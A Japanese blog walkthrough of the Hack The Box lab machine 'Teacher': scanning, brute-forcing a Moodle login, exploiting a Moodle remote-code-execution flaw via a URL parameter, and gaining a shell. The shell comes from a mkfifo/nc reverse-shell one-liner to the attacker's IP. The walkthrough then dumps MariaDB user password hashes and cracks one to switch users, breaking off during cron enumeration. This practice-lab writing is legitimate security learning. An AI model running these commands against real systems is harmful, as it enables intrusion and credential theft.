はじめに
筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は easy です。
Easy の machine のなかで 2 番目に評価が高い machine です
nmap
kali@kali:~$ nmap -sC -sV 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 05:36 EDT
Nmap scan report for 10.10.10.153
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds80 番 port をブラウザで見てみる
gobuster
kali@kali:~$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 -u http://10.10.10.153
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.153
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/29 05:17:36 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 403)
/moodle (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/29 05:31:37 Finished
===============================================================Web サイトを頑張って探索
/gallery.htmlのページのソースをみると何か一部分おかしい所がありますね。
images/5.pngによくわからない処理がくっ付いています。
/images/5.pngを開いても何も表示されないので curl で見てみます。
$ curl http://10.10.10.153/images/5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanniなるほど… “That’s an F” というのはこのメッセージに対する答えだったようですね。
/moodle からログイン
わかった情報を用いてログインします。 しかし、giovanni/Th4C00lTheachaF でログインしようとしてもログインできません。おいおい。。
brute force でゴリ押す
とりあえず the last character が F じゃないのかもしれないので brute force します。
list は /usr/share/wordlists/dirb/stress/alphanum_case_extra.txt を使用します
以下の設定で Burp の Intruder を使用します
すると
このように Th4C00lTheacha# で成功します。
password に Th4C00lTheacha# を使って
ログインに成功します(結局 That’s an F は何やったんや…)
moodle の Remote Code Execution
moodle には一部のバージョンで Remote Code Execution の脆弱性があります
https://blog.ripstech.com/2018/moodle-remote-code-execution/ こちらのサイトで紹介されている動画の通りに進めます(少し説明するにはめんどくさいのでサイトをチェックしてみてください)
↑url に&0=ping 10.10.14.13 で ping が通るか試しています
kali@kali:~$ sudo tcpdump -i tun0
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
03:22:55.665518 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [S], seq 3529097773, win 64240, options [mss 1460,sackOK,TS val 89662984 ecr 0,nop,wscale 7], length 0
03:22:55.837589 IP 10.10.10.153.http > 10.10.14.13.52754: Flags [S.], seq 2770244404, ack 3529097774, win 28960, options [mss 1357,sackOK,TS val 416124 ecr 89662984,nop,wscale 7], length 0
03:22:55.837642 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 89663156 ecr 416124], length 0
03:22:55.838152 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [P.], seq 1:550, ack 1, win 502, options [nop,nop,TS val 89663157 ecr 416124], length 549: HTTP: GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=ping%2010.10.14.13 HTTP/1.1
03:22:56.010796 IP 10.10.10.153.http > 10.10.14.13.52754: Flags [.], ack 550, win 235, options [nop,nop,TS val 416167 ecr 89663157], length 0
03:22:56.047524 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 1, length 64
03:22:56.047559 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 1, length 64
03:22:57.049785 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 2, length 64
03:22:57.049810 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 2, length 64
03:22:58.157466 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 3, length 64
03:22:58.157645 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 3, length 64
03:22:59.111049 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 4, length 64
03:22:59.111081 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 4, length 64
03:23:00.103073 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 5, length 64
03:23:00.103102 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 5, length 64
03:23:01.129041 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 6, length 64
03:23:01.129076 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 6, length 64
03:23:02.152756 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 7, length 64
03:23:02.152782 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 7, length 64
03:23:03.058237 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 8, length 64
03:23:03.058274 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 8, length 64通りました
シェルを取る
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4242 >/tmp/fを使います
(URL エンコードをしてから 0= の後にくっつけると成功します)
kali@kali:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.153] 58168
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$mysql を覗く
config.phpに DB の情報があるのでこれを使って mysql を覗きます
www-data@teacher:/var/www/html/moodle$ cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!www-data@teacher:/var/www/html/moodle/question$ mysql -u root -p
mysql -u root -p
Enter password: Welkom1!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 60
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show database
show database
-> ;
;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| moodle |
| mysql |
| performance_schema |
| phpmyadmin |
+--------------------+
5 rows in set (0.00 sec)
MariaDB [(none)]> show tables
show tables
-> ;
;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> shoe tables;
shoe tables;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'shoe tables' at line 1
MariaDB [(none)]> show tables;
show tables;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> use moodle
use moodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [moodle]> show tables;
show tables;
+----------------------------------+
| Tables_in_moodle |
+----------------------------------+
| mdl_analytics_indicator_calc |
| mdl_analytics_models |
| mdl_analytics_models_log |
| mdl_analytics_predict_samples |
| mdl_analytics_prediction_actions |
| mdl_analytics_predictions |
| mdl_analytics_train_samples |
| mdl_analytics_used_analysables |
| mdl_analytics_used_files |
| mdl_assign |
| mdl_assign_grades |
| mdl_assign_overrides |
| mdl_assign_plugin_config |
| mdl_assign_submission |
| mdl_assign_user_flags |
| mdl_assign_user_mapping |
| mdl_assignfeedback_comments |
| mdl_assignfeedback_editpdf_annot |
| mdl_assignfeedback_editpdf_cmnt |
| mdl_assignfeedback_editpdf_queue |
| mdl_assignfeedback_editpdf_quick |
| mdl_assignfeedback_file |
| mdl_assignment |
| mdl_assignment_submissions |
| mdl_assignment_upgrade |
| mdl_assignsubmission_file |
| mdl_assignsubmission_onlinetext |
| mdl_auth_oauth2_linked_login |
| mdl_backup_controllers |
| mdl_backup_courses |
| mdl_backup_logs |
| mdl_badge |
| mdl_badge_backpack |
| mdl_badge_criteria |
| mdl_badge_criteria_met |
| mdl_badge_criteria_param |
| mdl_badge_external |
| mdl_badge_issued |
| mdl_badge_manual_award |
| mdl_block |
| mdl_block_community |
| mdl_block_instances |
| mdl_block_positions |
| mdl_block_recent_activity |
| mdl_block_rss_client |
| mdl_blog_association |
| mdl_blog_external |
| mdl_book |
| mdl_book_chapters |
| mdl_cache_filters |
| mdl_cache_flags |
| mdl_capabilities |
| mdl_chat |
| mdl_chat_messages |
| mdl_chat_messages_current |
| mdl_chat_users |
| mdl_choice |
| mdl_choice_answers |
| mdl_choice_options |
| mdl_cohort |
| mdl_cohort_members |
| mdl_comments |
| mdl_competency |
| mdl_competency_coursecomp |
| mdl_competency_coursecompsetting |
| mdl_competency_evidence |
| mdl_competency_framework |
| mdl_competency_modulecomp |
| mdl_competency_plan |
| mdl_competency_plancomp |
| mdl_competency_relatedcomp |
| mdl_competency_template |
| mdl_competency_templatecohort |
| mdl_competency_templatecomp |
| mdl_competency_usercomp |
| mdl_competency_usercompcourse |
| mdl_competency_usercompplan |
| mdl_competency_userevidence |
| mdl_competency_userevidencecomp |
| mdl_config |
| mdl_config_log |
| mdl_config_plugins |
| mdl_context |
| mdl_context_temp |
| mdl_course |
| mdl_course_categories |
| mdl_course_completion_aggr_methd |
| mdl_course_completion_crit_compl |
| mdl_course_completion_criteria |
| mdl_course_completion_defaults |
| mdl_course_completions |
| mdl_course_format_options |
| mdl_course_modules |
| mdl_course_modules_completion |
| mdl_course_published |
| mdl_course_request |
| mdl_course_sections |
| mdl_data |
| mdl_data_content |
| mdl_data_fields |
| mdl_data_records |
| mdl_editor_atto_autosave |
| mdl_enrol |
| mdl_enrol_flatfile |
| mdl_enrol_lti_lti2_consumer |
| mdl_enrol_lti_lti2_context |
| mdl_enrol_lti_lti2_nonce |
| mdl_enrol_lti_lti2_resource_link |
| mdl_enrol_lti_lti2_share_key |
| mdl_enrol_lti_lti2_tool_proxy |
| mdl_enrol_lti_lti2_user_result |
| mdl_enrol_lti_tool_consumer_map |
| mdl_enrol_lti_tools |
| mdl_enrol_lti_users |
| mdl_enrol_paypal |
| mdl_event |
| mdl_event_subscriptions |
| mdl_events_handlers |
| mdl_events_queue |
| mdl_events_queue_handlers |
| mdl_external_functions |
| mdl_external_services |
| mdl_external_services_functions |
| mdl_external_services_users |
| mdl_external_tokens |
| mdl_feedback |
| mdl_feedback_completed |
| mdl_feedback_completedtmp |
| mdl_feedback_item |
| mdl_feedback_sitecourse_map |
| mdl_feedback_template |
| mdl_feedback_value |
| mdl_feedback_valuetmp |
| mdl_file_conversion |
| mdl_files |
| mdl_files_reference |
| mdl_filter_active |
| mdl_filter_config |
| mdl_folder |
| mdl_forum |
| mdl_forum_digests |
| mdl_forum_discussion_subs |
| mdl_forum_discussions |
| mdl_forum_posts |
| mdl_forum_queue |
| mdl_forum_read |
| mdl_forum_subscriptions |
| mdl_forum_track_prefs |
| mdl_glossary |
| mdl_glossary_alias |
| mdl_glossary_categories |
| mdl_glossary_entries |
| mdl_glossary_entries_categories |
| mdl_glossary_formats |
| mdl_grade_categories |
| mdl_grade_categories_history |
| mdl_grade_grades |
| mdl_grade_grades_history |
| mdl_grade_import_newitem |
| mdl_grade_import_values |
| mdl_grade_items |
| mdl_grade_items_history |
| mdl_grade_letters |
| mdl_grade_outcomes |
| mdl_grade_outcomes_courses |
| mdl_grade_outcomes_history |
| mdl_grade_settings |
| mdl_grading_areas |
| mdl_grading_definitions |
| mdl_grading_instances |
| mdl_gradingform_guide_comments |
| mdl_gradingform_guide_criteria |
| mdl_gradingform_guide_fillings |
| mdl_gradingform_rubric_criteria |
| mdl_gradingform_rubric_fillings |
| mdl_gradingform_rubric_levels |
| mdl_groupings |
| mdl_groupings_groups |
| mdl_groups |
| mdl_groups_members |
| mdl_imscp |
| mdl_label |
| mdl_lesson |
| mdl_lesson_answers |
| mdl_lesson_attempts |
| mdl_lesson_branch |
| mdl_lesson_grades |
| mdl_lesson_overrides |
| mdl_lesson_pages |
| mdl_lesson_timer |
| mdl_license |
| mdl_lock_db |
| mdl_log |
| mdl_log_display |
| mdl_log_queries |
| mdl_logstore_standard_log |
| mdl_lti |
| mdl_lti_submission |
| mdl_lti_tool_proxies |
| mdl_lti_tool_settings |
| mdl_lti_types |
| mdl_lti_types_config |
| mdl_message |
| mdl_message_airnotifier_devices |
| mdl_message_contacts |
| mdl_message_popup |
| mdl_message_processors |
| mdl_message_providers |
| mdl_message_read |
| mdl_message_working |
| mdl_messageinbound_datakeys |
| mdl_messageinbound_handlers |
| mdl_messageinbound_messagelist |
| mdl_mnet_application |
| mdl_mnet_host |
| mdl_mnet_host2service |
| mdl_mnet_log |
| mdl_mnet_remote_rpc |
| mdl_mnet_remote_service2rpc |
| mdl_mnet_rpc |
| mdl_mnet_service |
| mdl_mnet_service2rpc |
| mdl_mnet_session |
| mdl_mnet_sso_access_control |
| mdl_mnetservice_enrol_courses |
| mdl_mnetservice_enrol_enrolments |
| mdl_modules |
| mdl_my_pages |
| mdl_oauth2_endpoint |
| mdl_oauth2_issuer |
| mdl_oauth2_system_account |
| mdl_oauth2_user_field_mapping |
| mdl_page |
| mdl_portfolio_instance |
| mdl_portfolio_instance_config |
| mdl_portfolio_instance_user |
| mdl_portfolio_log |
| mdl_portfolio_mahara_queue |
| mdl_portfolio_tempdata |
| mdl_post |
| mdl_profiling |
| mdl_qtype_ddimageortext |
| mdl_qtype_ddimageortext_drags |
| mdl_qtype_ddimageortext_drops |
| mdl_qtype_ddmarker |
| mdl_qtype_ddmarker_drags |
| mdl_qtype_ddmarker_drops |
| mdl_qtype_essay_options |
| mdl_qtype_match_options |
| mdl_qtype_match_subquestions |
| mdl_qtype_multichoice_options |
| mdl_qtype_randomsamatch_options |
| mdl_qtype_shortanswer_options |
| mdl_question |
| mdl_question_answers |
| mdl_question_attempt_step_data |
| mdl_question_attempt_steps |
| mdl_question_attempts |
| mdl_question_calculated |
| mdl_question_calculated_options |
| mdl_question_categories |
| mdl_question_dataset_definitions |
| mdl_question_dataset_items |
| mdl_question_datasets |
| mdl_question_ddwtos |
| mdl_question_gapselect |
| mdl_question_hints |
| mdl_question_multianswer |
| mdl_question_numerical |
| mdl_question_numerical_options |
| mdl_question_numerical_units |
| mdl_question_response_analysis |
| mdl_question_response_count |
| mdl_question_statistics |
| mdl_question_truefalse |
| mdl_question_usages |
| mdl_quiz |
| mdl_quiz_attempts |
| mdl_quiz_feedback |
| mdl_quiz_grades |
| mdl_quiz_overrides |
| mdl_quiz_overview_regrades |
| mdl_quiz_reports |
| mdl_quiz_sections |
| mdl_quiz_slots |
| mdl_quiz_statistics |
| mdl_rating |
| mdl_registration_hubs |
| mdl_repository |
| mdl_repository_instance_config |
| mdl_repository_instances |
| mdl_repository_onedrive_access |
| mdl_resource |
| mdl_resource_old |
| mdl_role |
| mdl_role_allow_assign |
| mdl_role_allow_override |
| mdl_role_allow_switch |
| mdl_role_assignments |
| mdl_role_capabilities |
| mdl_role_context_levels |
| mdl_role_names |
| mdl_role_sortorder |
| mdl_scale |
| mdl_scale_history |
| mdl_scorm |
| mdl_scorm_aicc_session |
| mdl_scorm_scoes |
| mdl_scorm_scoes_data |
| mdl_scorm_scoes_track |
| mdl_scorm_seq_mapinfo |
| mdl_scorm_seq_objective |
| mdl_scorm_seq_rolluprule |
| mdl_scorm_seq_rolluprulecond |
| mdl_scorm_seq_rulecond |
| mdl_scorm_seq_ruleconds |
| mdl_search_index_requests |
| mdl_sessions |
| mdl_stats_daily |
| mdl_stats_monthly |
| mdl_stats_user_daily |
| mdl_stats_user_monthly |
| mdl_stats_user_weekly |
| mdl_stats_weekly |
| mdl_survey |
| mdl_survey_analysis |
| mdl_survey_answers |
| mdl_survey_questions |
| mdl_tag |
| mdl_tag_area |
| mdl_tag_coll |
| mdl_tag_correlation |
| mdl_tag_instance |
| mdl_task_adhoc |
| mdl_task_scheduled |
| mdl_tool_cohortroles |
| mdl_tool_customlang |
| mdl_tool_customlang_components |
| mdl_tool_monitor_events |
| mdl_tool_monitor_history |
| mdl_tool_monitor_rules |
| mdl_tool_monitor_subscriptions |
| mdl_tool_recyclebin_category |
| mdl_tool_recyclebin_course |
| mdl_tool_usertours_steps |
| mdl_tool_usertours_tours |
| mdl_upgrade_log |
| mdl_url |
| mdl_user |
| mdl_user_devices |
| mdl_user_enrolments |
| mdl_user_info_category |
| mdl_user_info_data |
| mdl_user_info_field |
| mdl_user_lastaccess |
| mdl_user_password_history |
| mdl_user_password_resets |
| mdl_user_preferences |
| mdl_user_private_key |
| mdl_wiki |
| mdl_wiki_links |
| mdl_wiki_locks |
| mdl_wiki_pages |
| mdl_wiki_subwikis |
| mdl_wiki_synonyms |
| mdl_wiki_versions |
| mdl_workshop |
| mdl_workshop_aggregations |
| mdl_workshop_assessments |
| mdl_workshop_assessments_old |
| mdl_workshop_comments_old |
| mdl_workshop_elements_old |
| mdl_workshop_grades |
| mdl_workshop_grades_old |
| mdl_workshop_old |
| mdl_workshop_rubrics_old |
| mdl_workshop_stockcomments_old |
| mdl_workshop_submissions |
| mdl_workshop_submissions_old |
| mdl_workshopallocation_scheduled |
| mdl_workshopeval_best_settings |
| mdl_workshopform_accumulative |
| mdl_workshopform_comments |
| mdl_workshopform_numerrors |
| mdl_workshopform_numerrors_map |
| mdl_workshopform_rubric |
| mdl_workshopform_rubric_config |
| mdl_workshopform_rubric_levels |
+----------------------------------+
388 rows in set (0.00 sec)
MariaDB [moodle]> select * from mdl_user
select * from mdl_user
-> ;
;
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
| id | auth | confirmed | policyagreed | deleted | suspended | mnethostid | username | password | idnumber | firstname | lastname | email | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin | currentlogin | lastip | secret | picture | url | description | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
| 1 | manual | 1 | 0 | 0 | 0 | 1 | guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO | | Guest user | | root@localhost | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | This user is a special user that allows read-only access to some courses. | 1 | 1 | 0 | 2 | 1 | 0 | 0 | 1530058999 | 0 | NULL | NULL | NULL | NULL | NULL |
| 2 | manual | 1 | 0 | 0 | 0 | 1 | admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 | | Admin | User | [email protected] | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 1530059097 | 1530059573 | 1530059097 | 1530059307 | 192.168.206.1 | | 0 | | | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1530059135 | 0 | NULL | | | | |
| 3 | manual | 1 | 0 | 0 | 0 | 1 | giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO | | Giovanni | Chhatta | [email protected] | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 1530059681 | 1586592855 | 1530069132 | 1586592777 | 10.10.14.13 | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1530059291 | 1530059291 | 0 | | | | | |
| 1337 | manual | 0 | 0 | 0 | 0 | 0 | Giovannibak | 7a860966115182402ed06375cf0a22af | | | | | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | NULL | 1 | 1 | 0 | 2 | 1 | 0 | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
4 rows in set (0.00 sec)
MariaDB [moodle]> select username, password from mdl_user;
select username, password from mdl_user;
+-------------+--------------------------------------------------------------+
| username | password |
+-------------+--------------------------------------------------------------+
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)
MariaDB [moodle]> \q
\q
Bye出てきた password を調べて giovanni に昇格
以下のサイトで調べます https://crackstation.net/
出てきた expelled を使って giovanni に切り替えます
www-data@teacher:/var/www/html/moodle/question$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle/question$ cd /
cd /
giovanni@teacher:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
giovanni@teacher:/$ cd home
cd home
giovanni@teacher:/home$ ls
ls
giovanni
giovanni@teacher:/home$ cd giovanni
cd giovanni
giovanni@teacher:~$ ls
ls
user.txt work
giovanni@teacher:~$ cat user.txtuser.txt が取れました
~/giovanni の中を色々調べる
giovanni@teacher:~$ ls
ls
user.txt work
giovanni@teacher:~$ cd work
cd work
giovanni@teacher:~/work$ find .
find .
.
./tmp
./tmp/courses
./tmp/courses/algebra
./tmp/courses/algebra/answersAlgebra
./tmp/backup_courses.tar.gz
./courses
./courses/algebra
./courses/algebra/answersAlgebra僕はここで完全に詰まったわけですが、
一つだけtimestampが変わり続けてるroot所有のファイルがあるからそのファイルが作成/更新されるようなcronjobがあるって推測するって流れ割と良く見るけど、自力で一つだけtimestampが変わり続けてるファイルに気づけたこと無い
— さんぽし (@sanpo_shiho) April 11, 2020
これでした。
giovanni@teacher:~/work$ ls -lR
ls -lR
.:
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp
./courses:
total 4
drwxr-xr-x 2 root root 4096 Jun 27 2018 algebra
./courses/algebra:
total 4
-rw-r--r-- 1 giovanni giovanni 109 Jun 27 2018 answersAlgebra
./tmp:
total 8
-rwxrwxrwx 1 root root 256 Apr 11 10:25 backup_courses.tar.gz
drwxrwxrwx 3 root root 4096 Jun 27 2018 courses
./tmp/courses:
total 4
drwxrwxrwx 2 root root 4096 Jun 27 2018 algebra
./tmp/courses/algebra:
total 4
-rwxrwxrwx 1 giovanni giovanni 109 Jun 27 2018 answersAlgebraroot 所有の backup_courses.tar.gz が Timestamp に気がつくべきでした。。
pspy を使う
だいたいこういう時は何かしらの cronjob が backup_courses.tar.gz を更新し続けてるんだろうと思われるので pspy を使って cronjob を調べます
giovanni@teacher:~/work$ ./pspy64
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/04/11 10:45:54 CMD: UID=1000 PID=958 | bash
2020/04/11 10:45:54 CMD: UID=1000 PID=956 | (sd-pam)
2020/04/11 10:45:54 CMD: UID=1000 PID=955 | /lib/systemd/systemd --user
2020/04/11 10:45:54 CMD: UID=33 PID=954 | su giovanni
2020/04/11 10:45:54 CMD: UID=33 PID=903 | /bin/bash
2020/04/11 10:45:54 CMD: UID=33 PID=902 | python -c import pty;pty.spawn("/bin/bash")
2020/04/11 10:45:54 CMD: UID=0 PID=9 |
2020/04/11 10:45:54 CMD: UID=33 PID=892 | nc 10.10.14.13 4242
2020/04/11 10:45:54 CMD: UID=33 PID=891 | /bin/sh -i
2020/04/11 10:45:54 CMD: UID=33 PID=890 | cat /tmp/f
2020/04/11 10:45:54 CMD: UID=33 PID=887 | sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4242 >/tmp/f
2020/04/11 10:45:54 CMD: UID=0 PID=87 |
2020/04/11 10:45:54 CMD: UID=0 PID=86 |
2020/04/11 10:45:54 CMD: UID=33 PID=853 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=852 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=851 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=850 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0 PID=85 |
2020/04/11 10:45:54 CMD: UID=33 PID=848 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=845 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=844 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=843 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=842 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=841 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0 PID=838 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0 PID=8 |
2020/04/11 10:45:54 CMD: UID=107 PID=710 | /usr/sbin/mysqld
2020/04/11 10:45:54 CMD: UID=0 PID=7 |
2020/04/11 10:45:54 CMD: UID=0 PID=551 | /sbin/agetty --noclear tty1 linux
2020/04/11 10:45:54 CMD: UID=0 PID=5 |
2020/04/11 10:45:54 CMD: UID=0 PID=422 | /usr/sbin/rsyslogd -n
2020/04/11 10:45:54 CMD: UID=0 PID=421 | /lib/systemd/systemd-logind
2020/04/11 10:45:54 CMD: UID=0 PID=42 |
2020/04/11 10:45:54 CMD: UID=105 PID=414 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2020/04/11 10:45:54 CMD: UID=0 PID=413 | /usr/bin/VGAuthService
2020/04/11 10:45:54 CMD: UID=0 PID=412 | /usr/sbin/cron -f
2020/04/11 10:45:54 CMD: UID=0 PID=41 |
2020/04/11 10:45:54 CMD: UID=100 PID=402 | /lib/systemd/systemd-timesyncd
2020/04/11 10:45:54 CMD: UID=0 PID=3 |
2020/04/11 10:45:54 CMD: UID=0 PID=299 |
2020/04/11 10:45:54 CMD: UID=0 PID=29 |
